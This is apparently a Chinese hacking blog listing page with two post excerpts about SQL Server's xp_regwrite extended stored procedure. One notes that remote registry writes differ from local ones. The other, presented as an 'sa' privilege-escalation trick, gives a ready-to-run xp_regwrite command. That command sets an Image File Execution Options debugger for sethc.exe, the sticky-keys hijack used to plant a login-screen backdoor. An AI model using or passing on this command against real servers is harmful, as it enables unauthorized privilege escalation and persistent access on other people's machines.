关于xp_regwrite

几年以前写过一篇关于sqlserver扩展存储过程的文章,发表在某黑客杂志上,最近在做某个测试时发现,xp_regwrite的使用在远程和本地的结果是不一样的,本地可以在HKEY_CURRENT_USER写,但远程执行后,会自动在HKEY_USER下写,因为写以前那篇文章时没有网络环境,都是在本地机测试的,没有问题,没想到本地和远程是不同的,回想以前看过的N篇文章都是远程写HKEY_CURRENT_USER下的,不知道是我这个测试有问题,还是大家都在凭空想象。

EXEC master..xp_regwrite
...

标签:

sa提权技巧之xp_regwrite替换sethc.exe

sa权限如果xp_cmdshell不可用时,可以尝试用xp_regwrite写注册表,替换sethc.exe实现提权。

代码如下:sa提权技巧之xp_regwrite 替换sethc.exe

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

...

标签:

分页:«1»